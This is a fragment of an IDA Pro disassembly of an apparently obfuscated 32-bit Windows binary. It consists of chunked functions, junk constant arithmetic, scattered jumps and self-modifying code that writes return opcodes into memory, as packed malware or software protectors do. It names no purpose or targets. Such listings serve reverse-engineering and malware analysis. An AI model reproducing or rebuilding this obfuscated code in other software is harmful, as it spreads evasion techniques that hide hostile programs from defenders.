; END OF FUNCTION CHUNK	FOR sub_457B90
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CCE7

loc_45AF14:				; CODE XREF: sub_44CCE7:loc_45A09Bj
		sub	ebx, 682B7E84h
		cmp	ebx, 29E144B1h
		jmp	loc_4578B5
; END OF FUNCTION CHUNK	FOR sub_44CCE7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CDD5

loc_45AF25:				; CODE XREF: sub_44CDD5:loc_44C6FEj
		pop	eax
		or	eax, 5A2F022h
		jnz	loc_4453AF

loc_45AF32:				; CODE XREF: sub_43B4EE+17F66j
		jmp	loc_44B9F9
; END OF FUNCTION CHUNK	FOR sub_44CDD5
; ---------------------------------------------------------------------------
		rol	edx, 1Ah
		jmp	loc_4453A3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D54D

loc_45AF3F:				; CODE XREF: sub_44D54D+Aj
		xchg	edx, [esp-4+arg_0]
		jmp	loc_4421A8
; END OF FUNCTION CHUNK	FOR sub_44D54D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A33C

loc_45AF47:				; CODE XREF: sub_44A33C+3122j
		shl	edx, 0Fh
		xor	ecx, 0E830370Eh
		mov	edi, 829580A7h

loc_45AF55:				; CODE XREF: sub_4552EB:loc_452F2Fj
		mov	eax, 0A2CD59D9h
		jmp	loc_453891
; END OF FUNCTION CHUNK	FOR sub_44A33C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452E72

loc_45AF5F:				; CODE XREF: sub_452E72-3ACAj
		mov	eax, 0F38AA262h
		call	sub_442C3E
		mov	ds:off_41E150, eax
; END OF FUNCTION CHUNK	FOR sub_452E72
; START	OF FUNCTION CHUNK FOR sub_453867

loc_45AF6F:				; CODE XREF: sub_453867:loc_43CFEDj
		lea	eax, loc_45A8C2
		mov	byte ptr [eax],	0C3h
		jmp	loc_4459D3
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CB8B

loc_45AF7D:				; CODE XREF: sub_44CB8B:loc_45A8C2j
		pop	edx
		jmp	loc_453D2C
; END OF FUNCTION CHUNK	FOR sub_44CB8B
; ---------------------------------------------------------------------------
		mov	edi, 0FA704198h
		jmp	sub_454692
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AFC4

loc_45AF8D:				; CODE XREF: sub_45AFC4:loc_43D027j
					; y2kk37jd:00443E6Cj
		add	edx, 0BEC1F6EDh
		push	edi
		call	sub_458713

loc_45AF99:				; CODE XREF: sub_44626D+1080Ej
		jmp	loc_43DF17
; END OF FUNCTION CHUNK	FOR sub_45AFC4
; ---------------------------------------------------------------------------

loc_45AF9E:				; CODE XREF: y2kk37jd:00451C49j
		jmp	locret_44E55B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_45AFA3:				; CODE XREF: sub_445226+13Dj
		test	ebx, ecx
		jmp	loc_44F536
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444463

loc_45AFAA:				; CODE XREF: sub_444463:loc_45C08Dj
		jnz	loc_44155C
		test	ecx, 30570558h
		jmp	loc_44154E
; END OF FUNCTION CHUNK	FOR sub_444463
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_297. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BC3F

loc_45AFBC:				; CODE XREF: sub_45BC3F-13327j
		jmp	loc_4589DA
; END OF FUNCTION CHUNK	FOR sub_45BC3F
; ---------------------------------------------------------------------------

loc_45AFC1:				; CODE XREF: y2kk37jd:0043FF24j
		shr	ecx, 0Bh

; =============== S U B	R O U T	I N E =======================================



sub_45AFC4	proc near		; CODE XREF: sub_43CBDE+190F2p

; FUNCTION CHUNK AT 0043D027 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043DC19 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043DF17 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044B22E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AF8D SIZE 00000011 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		push	76C6428Eh
		pop	edx
		or	edx, 110C455h
		rol	edx, 1
		jmp	loc_43DC19
sub_45AFC4	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_45AFDB:				; CODE XREF: y2kk37jd:00459481j
		mov	edx, [edi]

loc_45AFDD:				; CODE XREF: y2kk37jd:00459473j
		and	edx, 6651888Eh
		add	edx, 99EE7F76h
		xchg	edx, [esp]
; START	OF FUNCTION CHUNK FOR sub_445226

loc_45AFEC:				; CODE XREF: sub_445226-6DBCj
		push	10h
		call	sub_43C9E7

loc_45AFF3:				; CODE XREF: sub_441D1B+Aj
		jmp	loc_456605
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_45AFF8:				; CODE XREF: y2kk37jd:0043EDAEj
					; y2kk37jd:004404C1j
		test	eax, ecx
		jmp	loc_4552FC
; ---------------------------------------------------------------------------

loc_45AFFF:				; CODE XREF: y2kk37jd:loc_43DC4Cj
		xchg	ecx, [esi]
		adc	ebx, eax
		xor	esi, 98AFFDB0h
		jmp	loc_44B97B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4447EA

loc_45B00E:				; CODE XREF: sub_4447EA:loc_451348j
		add	esp, 8
		mov	[ebp-4], eax
		jmp	loc_456230
; END OF FUNCTION CHUNK	FOR sub_4447EA

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_45B019	proc near		; CODE XREF: sub_44B924+B581p
					; y2kk37jd:004594F5p

var_28		= dword	ptr -28h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_14		= dword	ptr -14h
var_C		= dword	ptr -0Ch
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043D2C1 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00458EBF SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0045A5CB SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		add	esp, 0FFFFFFD8h
		jmp	loc_45A5CB
sub_45B019	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4514DE

loc_45B024:				; CODE XREF: sub_4514DE:loc_452E53j
		jz	loc_45A109
		jmp	loc_44E82B
; END OF FUNCTION CHUNK	FOR sub_4514DE

; =============== S U B	R O U T	I N E =======================================



sub_45B02F	proc near		; DATA XREF: y2kk37jd:0044A7A9o
		call	sub_442C3E
		push	offset loc_441E66
		jmp	nullsub_516
sub_45B02F	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4564EB

loc_45B03E:				; CODE XREF: sub_4564EB:loc_43BA61j
		sub	eax, 0C3EAF20Eh
		jnp	loc_44F34B
		xchg	ecx, esi

loc_45B04C:				; CODE XREF: y2kk37jd:loc_43CD76j
		jmp	loc_445079
; END OF FUNCTION CHUNK	FOR sub_4564EB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440F0C

loc_45B051:				; CODE XREF: sub_440F0C+7549j
		jge	loc_43F3CF
		shr	eax, 1Bh
		cdq
		shr	eax, 8
		jmp	loc_4403BC
; END OF FUNCTION CHUNK	FOR sub_440F0C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4443CD

loc_45B063:				; CODE XREF: sub_4443CD+1E81j
		and	eax, 527F0A28h
		xor	eax, 0AD570E87h
		add	eax, 37D936Ah
		push	esi
		jmp	loc_43B899
; END OF FUNCTION CHUNK	FOR sub_4443CD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E63A

loc_45B07B:				; CODE XREF: sub_44E63A:loc_441E93j
		mov	eax, [esp+0]
		push	edx
		push	ecx
		push	393057E7h
		jmp	loc_4517C2
; END OF FUNCTION CHUNK	FOR sub_44E63A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456D3F

loc_45B08A:				; CODE XREF: sub_456D3F+35EBj
		jno	loc_4448AF
		xchg	ebx, edx
		and	esi, eax
		jmp	loc_44A740
; END OF FUNCTION CHUNK	FOR sub_456D3F
; ---------------------------------------------------------------------------

loc_45B099:				; DATA XREF: sub_43BA66:loc_459372o
		cmp	al, 0A4h
		call	sub_443674
; START	OF FUNCTION CHUNK FOR sub_458FCE

loc_45B0A0:				; CODE XREF: sub_458FCE-10CFEj
		jmp	nullsub_364
; END OF FUNCTION CHUNK	FOR sub_458FCE

; =============== S U B	R O U T	I N E =======================================



sub_45B0A5	proc near		; DATA XREF: sub_43F0A5+1A9A8o

arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 00448168 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044D779 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450981 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0045815C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458AC9 SIZE 0000000F BYTES

		test	eax, 70h
		jz	loc_458BF4
		jmp	loc_45815C
sub_45B0A5	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_45B0B5:				; CODE XREF: y2kk37jd:00445CE9j
		jno	loc_45540C
		jl	loc_4421E7
; START	OF FUNCTION CHUNK FOR sub_43BB55

loc_45B0C1:				; CODE XREF: sub_43BB55:loc_459F41j
		add	edi, 0C66E6EE3h
		push	offset loc_443BA7
		jmp	nullsub_365
; END OF FUNCTION CHUNK	FOR sub_43BB55
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_45B0D1:				; CODE XREF: sub_445226:loc_43BA11j
		jnz	loc_44FC06
		jmp	loc_440502
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_45B0DC:				; CODE XREF: y2kk37jd:loc_445587j
		jnz	loc_454351
; START	OF FUNCTION CHUNK FOR sub_454C24

loc_45B0E2:				; CODE XREF: sub_454C24:loc_457641j
		jmp	loc_453EF3
; END OF FUNCTION CHUNK	FOR sub_454C24
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D627

loc_45B0E7:				; CODE XREF: sub_44D627+110Fj
		sub	edi, ebx
		and	edx, 0A0AE75D0h
		ror	ebx, 5
		not	eax
		jmp	loc_45C17F
; END OF FUNCTION CHUNK	FOR sub_44D627
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440AA5

loc_45B0F9:				; CODE XREF: sub_440AA5+15j
		lea	eax, loc_4506D5
		mov	byte ptr [eax],	0C3h
		jmp	loc_4506D5
; ---------------------------------------------------------------------------

loc_45B107:				; CODE XREF: sub_440AA5:loc_4506D5j
		pop	edx
		mov	eax, [esp+0]
		jmp	loc_457D48
; END OF FUNCTION CHUNK	FOR sub_440AA5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_45B110:				; CODE XREF: sub_445226+1124j
		push	4C91A0h
		push	8271AC4Ch
		pop	eax
		rol	eax, 0Bh
		add	eax, 0D8EE9700h
		sub	eax, 0E8915114h
		xor	eax, 39134FF2h
		jmp	loc_4503B5
; END OF FUNCTION CHUNK	FOR sub_445226

; =============== S U B	R O U T	I N E =======================================



sub_45B135	proc near		; CODE XREF: y2kk37jd:0043B45Bj
					; sub_445226:loc_45BD5Fp
		xchg	edx, [esp+0]
		pop	edx

loc_45B139:				; CODE XREF: sub_43D2FC+43C3j
		push	edx
		call	sub_43B7F3

loc_45B13F:				; CODE XREF: y2kk37jd:00450777j
		jmp	sub_4487FD
sub_45B135	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448306

loc_45B144:				; CODE XREF: sub_448306+3j
		jmp	loc_449798
; END OF FUNCTION CHUNK	FOR sub_448306
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453778

loc_45B149:				; CODE XREF: sub_453778+6j
		push	14647159h
		pop	edx
		or	edx, 2057144Ch
		add	edx, ds:4000EAh
		or	edx, 226257F3h

loc_45B161:				; CODE XREF: y2kk37jd:loc_442C04j
		xor	edx, 9F096059h
		add	edx, ebp
		jmp	loc_43E3DD
; END OF FUNCTION CHUNK	FOR sub_453778
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448C80

loc_45B16E:				; CODE XREF: sub_448C80-65C6j
		rol	esi, 1Ch
		and	esi, 0C372BD1Ch
		add	esi, 0BF2431E3h
		xchg	esi, [esp+4+var_4]
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_448C80
; ---------------------------------------------------------------------------

loc_45B185:				; CODE XREF: y2kk37jd:00444575j
		test	edx, edi
		jmp	loc_446B7E

; =============== S U B	R O U T	I N E =======================================



sub_45B18C	proc near		; CODE XREF: sub_43C851:loc_44B126p
					; y2kk37jd:00459DBBj
		xchg	edx, [esp+0]
		pop	edx
		push	0C61FAF32h
		pop	esi
		xor	esi, 2A4378AFh
		jmp	loc_456027
sub_45B18C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_45B1A1:				; CODE XREF: sub_45689F:loc_45040Aj
		pop	ecx
		rol	ecx, 0Fh
		sub	ecx, 0AB7596A8h
		add	ecx, 548BF46Bh
		jmp	loc_455ED8
; END OF FUNCTION CHUNK	FOR sub_45689F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_49. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_45B1B7:				; CODE XREF: y2kk37jd:004556BAj
		jmp	loc_43B79B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451634

loc_45B1BC:				; CODE XREF: sub_451634+8CB0j
		test	ebp, ebx
		jmp	loc_4423E9
; END OF FUNCTION CHUNK	FOR sub_451634
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458520

loc_45B1C3:				; CODE XREF: sub_458520-1D114j
		call	sub_44C56D

loc_45B1C8:				; CODE XREF: y2kk37jd:00450C06j
		jmp	nullsub_457
; END OF FUNCTION CHUNK	FOR sub_458520
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8B8

loc_45B1CD:				; CODE XREF: sub_43F8B8:loc_44C171j
		adc	edi, esi
		jmp	loc_43B51A
; END OF FUNCTION CHUNK	FOR sub_43F8B8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F346

loc_45B1D4:				; CODE XREF: sub_43F346:loc_451E95j
		sub	eax, 0FB38C779h
		rol	eax, 6
		test	eax, 2000h
		jmp	loc_44734E
; END OF FUNCTION CHUNK	FOR sub_43F346
; ---------------------------------------------------------------------------

loc_45B1E8:				; CODE XREF: y2kk37jd:00451F40j
		cmp	ebx, 1F35A6E0h
		jmp	loc_44C9E4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_45B1F3:				; CODE XREF: sub_445226+12265j
		or	edx, 71371B3Eh
		add	edx, 9D391226h
		call	sub_440CD1
; END OF FUNCTION CHUNK	FOR sub_445226
; START	OF FUNCTION CHUNK FOR sub_450F17

loc_45B204:				; CODE XREF: sub_450F17-E237j
		push	edi
		mov	edi, edx
		push	offset sub_44A011
		jmp	nullsub_366
; END OF FUNCTION CHUNK	FOR sub_450F17
; ---------------------------------------------------------------------------

loc_45B211:				; CODE XREF: y2kk37jd:loc_43B973j
		xchg	eax, [esp]
		pushf

loc_45B215:				; CODE XREF: y2kk37jd:0045AB97j
		push	9D492126h
		pop	edi
		rol	edi, 9
		and	edi, 4C4108BEh
		jmp	loc_43CA18
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445568

loc_45B229:				; CODE XREF: sub_445568-1936j
		jnz	loc_43CF5D
		jmp	loc_44193A
; END OF FUNCTION CHUNK	FOR sub_445568
; ---------------------------------------------------------------------------

loc_45B234:				; CODE XREF: y2kk37jd:00441840j
		jg	loc_451857
; START	OF FUNCTION CHUNK FOR sub_4599BE

loc_45B23A:				; CODE XREF: sub_4599BE:loc_441823j
		add	edi, 0B0590A44h
		xchg	edi, [esp+4+var_4]

loc_45B243:				; CODE XREF: y2kk37jd:loc_44768Dj
		jmp	sub_4448E2
; END OF FUNCTION CHUNK	FOR sub_4599BE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_45B248:				; CODE XREF: sub_453867-10BEAj
		cdq
		add	eax, [esp+14h+var_14]
		adc	edx, [esp+14h+var_10]
		add	esp, 8
		movzx	eax, word ptr [eax]
		shl	eax, 2
		mov	edx, [ebp-14h]
		mov	edx, [edx+1Ch]
		jmp	loc_451CDE
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------
		jmp	ds:off_41E198
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DF1F

loc_45B26A:				; CODE XREF: sub_43DF1F+4B9j
					; sub_43DF1F+2F09j ...
		jno	loc_4509D4
		xchg	ebx, [esp+4+var_4]
		mov	edx, ebx
		pop	ebx
		mov	eax, [esp+0]
		jmp	loc_455FB7
; END OF FUNCTION CHUNK	FOR sub_43DF1F
; ---------------------------------------------------------------------------

loc_45B27E:				; CODE XREF: y2kk37jd:0044D73Cj
		xchg	ecx, ebp
; START	OF FUNCTION CHUNK FOR sub_442F9C

loc_45B280:				; CODE XREF: sub_442F9C+A793j
		sub	ebx, 8894A684h
		jb	loc_45A6C5
		jns	loc_444AD4
		jmp	loc_44DA00
; END OF FUNCTION CHUNK	FOR sub_442F9C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E19

loc_45B297:				; CODE XREF: y2kk37jd:00447272j
					; sub_446E19+92B0j
		jnz	loc_443E14
		and	ebp, 0F5EC00DEh
		jmp	loc_45B750
; END OF FUNCTION CHUNK	FOR sub_446E19
; ---------------------------------------------------------------------------

loc_45B2A8:				; CODE XREF: y2kk37jd:004535A7j
		jbe	loc_449417
		jge	loc_45529F
		jmp	loc_441FA1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C326

loc_45B2B9:				; CODE XREF: sub_43C326+1F3D7j
		call	sub_443AA7
; END OF FUNCTION CHUNK	FOR sub_43C326
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_45B2BE:				; CODE XREF: sub_4411C3:loc_44B1ABj
		xchg	ebp, [esp+0Ch+var_C]
		push	offset sub_44B4AA
		jmp	nullsub_368
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44346B

loc_45B2CB:				; CODE XREF: sub_44346B-D13j
					; sub_442376:loc_45786Ej
		push	ecx
		call	sub_44CC31
; END OF FUNCTION CHUNK	FOR sub_44346B
; START	OF FUNCTION CHUNK FOR sub_445787

loc_45B2D1:				; CODE XREF: y2kk37jd:0043B7A5j
					; sub_445787:loc_45A59Fj
		jmp	loc_447FE8
; END OF FUNCTION CHUNK	FOR sub_445787

; =============== S U B	R O U T	I N E =======================================



sub_45B2D6	proc near		; DATA XREF: y2kk37jd:0045950Co
		push	edx
		push	eax
sub_45B2D6	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44B924

loc_45B2D8:				; CODE XREF: sub_44B924+26B6j
		mov	eax, [ebp-8]
		cdq
		add	eax, [esp+4+var_4]
		adc	edx, [esp+4]
		jmp	loc_451348
; END OF FUNCTION CHUNK	FOR sub_44B924
; ---------------------------------------------------------------------------

loc_45B2E8:				; CODE XREF: y2kk37jd:0045399Cj
		mov	byte ptr [eax],	0C3h
		jmp	loc_440F3F
; ---------------------------------------------------------------------------
		push	ecx
		push	689E04EDh
		pop	ecx
		xor	ecx, ds:4000EFh
		sub	ecx, 1834DEA5h
		jmp	loc_43B296
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441F30

loc_45B308:				; CODE XREF: sub_441F30+6j
		xchg	edi, [esp+0]
		mov	edx, edi
		pop	edi
		mov	eax, [esp-4+arg_0]
		push	edx
		call	sub_45ADEC
		mov	eax, 38F24592h
		push	ebx
		jmp	loc_43CA2D
; END OF FUNCTION CHUNK	FOR sub_441F30
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44723A

loc_45B322:				; CODE XREF: sub_44723A-25A3j
		mov	[ebp+0], eax
		cmp	esi, 0FC8A21Ch
		jmp	loc_4599C4
; END OF FUNCTION CHUNK	FOR sub_44723A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44113A

loc_45B330:				; CODE XREF: sub_44113A+8EB3j
		push	eax
		jmp	loc_45C413
; ---------------------------------------------------------------------------

loc_45B336:				; CODE XREF: sub_44113Aj
		mov	edx, ds:dword_4431A0
		or	edx, edx
		jnz	loc_449D6B
		jmp	loc_454D4C
; END OF FUNCTION CHUNK	FOR sub_44113A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F770

loc_45B349:				; CODE XREF: y2kk37jd:loc_4471F6j
					; sub_43F770+AD16j
		and	edx, 249779h
		add	edx, 3D5C23h
		call	sub_44D715

loc_45B35A:				; CODE XREF: sub_43B850+Cj
		jmp	nullsub_202
; END OF FUNCTION CHUNK	FOR sub_43F770
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456890

loc_45B35F:				; CODE XREF: sub_456890+Aj
		push	977D7E87h
		pop	edx
		sub	edx, 7BD581F3h
		and	edx, 8F041E34h
		jmp	loc_44F5DB
; END OF FUNCTION CHUNK	FOR sub_456890
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444A2B

loc_45B376:				; CODE XREF: sub_444A2B-4E77j
		mov	eax, [ebp+8]
		cmp	dword ptr [eax-1Ch], 0F7h
		jnz	loc_43F403

loc_45B386:				; CODE XREF: y2kk37jd:0043E17Aj
					; sub_444A2B-4E7Dj ...
		push	offset sub_43B37E
		jmp	nullsub_371
; END OF FUNCTION CHUNK	FOR sub_444A2B
; ---------------------------------------------------------------------------

loc_45B390:				; CODE XREF: y2kk37jd:0044AD8Bj
		jle	loc_43D581
		ror	ecx, 12h
		jmp	loc_44E1B5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD0D

loc_45B39E:				; CODE XREF: sub_43BD0D:loc_450450j
					; y2kk37jd:00450463j
		add	ecx, 807566CAh
		mov	ecx, [ecx]
		movzx	edx, byte ptr [ecx+edx]
		and	eax, edx
		jnz	loc_458FB4
		jmp	loc_4495BD
; END OF FUNCTION CHUNK	FOR sub_43BD0D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D51F

loc_45B3B7:				; CODE XREF: sub_44D51F-EE85j
		mov	[ebp+var_B], al
		xor	eax, eax
		mov	al, [ebp+var_B]
		mov	ecx, 8
		sub	ecx, eax
		xor	eax, eax
		push	offset loc_44DC4B
		jmp	nullsub_372
; END OF FUNCTION CHUNK	FOR sub_44D51F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8B8

loc_45B3D2:				; CODE XREF: sub_43F8B8:loc_452246j
		jnz	loc_43D5B7

loc_45B3D8:				; CODE XREF: y2kk37jd:0044E196j
		jmp	loc_44F90F
; END OF FUNCTION CHUNK	FOR sub_43F8B8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B4F9

loc_45B3DD:				; CODE XREF: sub_43B4F9+BE69j
		jmp	nullsub_390
; END OF FUNCTION CHUNK	FOR sub_43B4F9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BF31

loc_45B3E2:				; CODE XREF: sub_43BF31+3A17j
		jmp	loc_44FBCB
; END OF FUNCTION CHUNK	FOR sub_43BF31
; ---------------------------------------------------------------------------
		ja	loc_457D3D
		xor	edx, eax
		cmp	ecx, 3F6FC5FCh
		jmp	loc_45065E
; ---------------------------------------------------------------------------
		mov	eax, [esp]
		call	sub_4526B7
		retn
; ---------------------------------------------------------------------------

loc_45B403:				; CODE XREF: y2kk37jd:0045A740j
		jmp	loc_457443
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45704E

loc_45B408:				; CODE XREF: sub_45704E-B2CEj
		jmp	loc_44D49D
; END OF FUNCTION CHUNK	FOR sub_45704E
; ---------------------------------------------------------------------------
		db 51h,	13h, 5Ah
dword_45B410	dd 0			; DATA XREF: sub_445226-85C7w
					; sub_442829:loc_4407E9r ...
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459703

loc_45B414:				; CODE XREF: sub_459703+Aj
		jmp	loc_45411A
; END OF FUNCTION CHUNK	FOR sub_459703
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440EC8

loc_45B419:				; CODE XREF: sub_440EC8+A86Fj
		jmp	loc_453B46
; END OF FUNCTION CHUNK	FOR sub_440EC8

; =============== S U B	R O U T	I N E =======================================



sub_45B41E	proc near		; CODE XREF: sub_414954+253p
					; sub_414954+26Cp ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 004421E7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004475FB SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004490D6 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00452281 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00452F3A SIZE 00000020 BYTES
; FUNCTION CHUNK AT 004555B3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458611 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AB11 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0045B642 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0045C5BB SIZE 00000005 BYTES

		push	eax

loc_45B41F:				; CODE XREF: sub_44346B:loc_453878j
		push	0A54BE68h
		pop	eax
		jmp	loc_458611
sub_45B41E	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455556

loc_45B42A:				; CODE XREF: sub_455556+3A59j
		mov	ecx, eax

loc_45B42C:				; CODE XREF: sub_455556:loc_44F28Aj
		mov	eax, [ebp-4]
		xor	edx, edx
		div	dword ptr [ebp-8]
		mov	[ebp-0Ch], edx

loc_45B437:				; CODE XREF: sub_455556:loc_43DBE8j
		push	4FEA39C7h
		shl	eax, 5
		jmp	loc_450DEF
; END OF FUNCTION CHUNK	FOR sub_455556
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D8CE

loc_45B444:				; CODE XREF: sub_44D8CE+7j
		xchg	edi, [esp+0]
		push	esi
		push	25FEF00Ch
		pop	esi
		sub	esi, 0B5A516EAh
		jmp	loc_43B3F6
; END OF FUNCTION CHUNK	FOR sub_44D8CE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DBF8

loc_45B459:				; CODE XREF: sub_44DBF8:loc_45701Cj
		jz	loc_43F5AB
		jmp	loc_449CE0
; END OF FUNCTION CHUNK	FOR sub_44DBF8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447423

loc_45B464:				; CODE XREF: sub_447423+1Fj
		jge	loc_44C5A9

loc_45B46A:				; CODE XREF: sub_44D3E1+Fj
		jmp	loc_4518DC
; END OF FUNCTION CHUNK	FOR sub_447423
; ---------------------------------------------------------------------------
		cdq
		jmp	loc_44C5A7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452C0C

loc_45B475:				; CODE XREF: sub_452C0C+24j
		mov	eax, [ebp+8]
		push	eax
		cmp	dword ptr [ebp-14h], 5
		setz	al
		call	sub_45024B
		pop	ecx
		call	sub_45484D

loc_45B48B:				; CODE XREF: sub_43D4CE+14BEAj
		jmp	nullsub_381
; END OF FUNCTION CHUNK	FOR sub_452C0C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_464. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_45B491	proc near		; CODE XREF: y2kk37jd:00442E23j
					; sub_4504FB+8p

; FUNCTION CHUNK AT 0043F87B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FC1E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D84B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00454704 SIZE 0000000B BYTES

		xchg	edx, [esp+0]
		pop	edx
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jmp	loc_43FC1E
sub_45B491	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD0D

loc_45B49E:				; CODE XREF: sub_43BD0D:loc_44AB17j
		xchg	edi, [esp+0Ch+var_C]
		jmp	loc_43B4DF
; END OF FUNCTION CHUNK	FOR sub_43BD0D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DF1F

loc_45B4A6:				; CODE XREF: sub_43DF1F+1384Aj
		ror	ebp, 3
		mov	esi, 0A9C02255h

loc_45B4AE:				; CODE XREF: sub_43DF1F:loc_45175Ej
		xor	eax, 6397F515h
		add	eax, 99A3ACDAh
		call	sub_442C3E
		push	ebx
		push	75BAAA26h
		pop	ebx
		jmp	loc_440C94
; END OF FUNCTION CHUNK	FOR sub_43DF1F

; =============== S U B	R O U T	I N E =======================================



sub_45B4CB	proc near		; CODE XREF: y2kk37jd:00454CE4j
					; sub_4465C3:loc_455CC3j ...
